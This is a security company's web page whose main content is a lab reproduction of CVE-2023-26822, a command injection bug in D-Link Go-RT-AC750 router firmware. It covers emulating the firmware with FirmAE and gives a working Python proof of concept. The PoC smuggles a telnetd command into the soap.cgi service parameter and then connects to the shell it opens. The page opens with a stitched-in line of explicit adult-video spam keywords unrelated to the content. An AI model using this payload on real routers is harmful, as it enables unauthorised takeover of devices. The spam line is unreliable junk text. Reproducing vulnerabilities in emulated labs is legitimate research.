和邻居寡妇做爰免费观看_日本特黄特色大片免费视频电影_国产视频h,百合宿舍肉h文,av不卡免费看,一级片一区二区三区





首頁 產品與服務 解決方案 客戶案例 技術支持 合作發(fā)展 關于美創(chuàng) 用戶退出 合作商登錄 用戶登錄 申請試用

行業(yè)解決方案政府解決方案金融解決方案醫(yī)療解決方案教育解決方案能源解決方案物流交通解決方案

售后服務文檔中心年度培訓

渠道政策申請成為合作伙伴渠道專區(qū)

了解美創(chuàng) 公司介紹發(fā)展歷程企業(yè)文化權威認可美創(chuàng)年刊
新聞中心公司動態(tài) 行業(yè)資訊安全研究
加入我們
聯系我們產品咨詢與試用總部與分支機構

公司動態(tài) 行業(yè)資訊安全研究

熱門閱讀

美創(chuàng)科技打造縣域醫(yī)療災備新標桿｜神木市醫(yī)院 HIS 系統數據庫分鐘級切換演練實錄

2025-07-02

百萬罰單警示！DCAS助力金融機構筑牢數據安全防線，實現監(jiān)管合規(guī)

2025-06-20

2025中國互聯網產業(yè)年會丨《中國互聯網產業(yè)綠色算力發(fā)展倡議》正式發(fā)布

2025-02-07

美創(chuàng)用戶專訪 | 精細化管理：醫(yī)療行業(yè)數據分類分級的策略與實踐

2025-01-10

容災演練雙月報｜美創(chuàng)助力某特大型通信基礎設施央企順利完成多個核心系統異地容災演練

2025-01-10

每周安全速遞3?? | Aeza集團因托管勒索軟件和信息竊取服務器而受到制裁

2025-07-11

每周安全速遞3?? | Aeza集團因托管勒索軟件和信息竊取服務器而受到制裁

2025-07-04

每周安全速遞3?? | 俄羅斯法院釋放多名REvil勒索軟件團伙成員引發(fā)爭議

2025-06-27

每周安全速遞3?? | 勒索團伙聲稱竊取Freedman HealthCare敏感文件

2025-06-20

每周安全速遞3?? | Play勒索團伙利用SimpleHelp漏洞實施雙重勒索

2025-06-13

D-Link Go-RT-AC750 命令注入漏洞（CVE-2023-26822）復現

發(fā)布時間：2023-05-26 閱讀次數： 780 次

漏洞概述

D-Link Go-RT-AC750是一款雙頻無線路由器。

D-Link Go-RT-AC750在固件版本為revA_v101b03中存在命令注入漏洞，漏洞編號：CVE-2023-26822。未經授權的攻擊者可以請求 /soap.cgi 路由通過攜帶的參數進行命令拼接，從而控制路由器。

環(huán)境搭建

1.FirmAE 工具安裝；首先拉取FirmAE 工具倉庫

git clone --recursive https://github.com/pr0v3rbs/FirmAE

運行下載腳本；

cd FirmAE/./download.sh

運行./install.sh進行安裝

2.下載固件

本文模擬的是設備型號為Go-RT-AC750，固件版本：revA_v101b03

下載地址:

https://eu.dlink.com/uk/en/products/go-rt-ac750-wireless-ac750-dual-band-easy-

下載后得到GORTAC750_A1_FW_v101b03.bin固件文件

3.FirmAE工具初始化

在FirmAE工具目錄下執(zhí)行./init.sh進行初始化

4.安裝binwalk

這里使用FirmAE工具目錄下的binwalk安裝程序進行安裝

cd binwalk-2.3.3/

python3 setup.py install

5.模擬運行固件
執(zhí)行如下命令對固件進行解壓

binwalk -Me /root/GORTAC750_A1_FW_v101b03.bin --run-as=root

執(zhí)行如下命令來模擬運行固件

sudo ./run.sh -r GORTAC750 /root/GORTAC750_A1_FW_v101b03.bin

使用瀏覽器訪問http://192.168.0.1，出現如下界面則表明成功模擬了一臺D-Link Go-RT-AC750路由器

漏洞復現

POC內容如下：

ｆｒｏｍ socket import *ｆｒｏｍ os import *ｆｒｏｍ time import *
request = b"POST /soap.cgi?service=&&telnetd -p 4123& HTTP/1.1\r\n"request += b"Host: localhost:49152\r\n"request += b"Content-Type: text/xml\r\n"request += b"Content-Length: 88\r\n"request += b"SOAPAction: a#b\r\n\r\n" s = socket(AF_INET, SOCK_STREAM)s.connect((gethostbyname("192.168.0.1"), 49152))s.send(request) sleep(10)system('telnet 192.168.0.1 4123')